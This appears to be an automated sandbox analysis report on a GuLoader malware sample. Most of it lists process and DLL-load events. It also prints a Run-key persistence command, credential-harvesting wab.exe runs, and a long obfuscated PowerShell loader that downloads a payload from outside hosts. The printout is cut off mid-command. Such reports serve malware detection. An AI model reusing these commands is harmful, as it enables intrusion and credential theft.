              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1844677982.0000000002D05000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb>b source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("PowerShell", ""cls;write 'Stumpnser Midernes Fugtighe", "", "", "0");
              Yara detected GuLoader
              Source: Yara matchFile source: 00000005.00000002.1856054813.00000000090AD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2247528936.0000000003BCD000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fattigfint)$global:Rudyard = [System.Text.Encoding]::ASCII.GetString($Oratorically)$global:Bestiller=$Rudyard.substring($Spidskandidaternes,$Amphitoky)<#Consultatively Kulminationer
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Unpumicated $Inddmningdducible $Tamburmajors), (Muscologist @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tidslernes222 = [AppDomain]::CurrentDomain.GetA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cestode)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Uranosphaerite, $false).DefineType($Postboy, $Seq
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fattigfint)$global:Rudyard = [System.Text.Encoding]::ASCII.GetString($Oratorically)$global:Bestiller=$Rudyard.substring($Spidskandidaternes,$Amphitoky)<#Consultatively Kulminationer
              Obfuscated command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
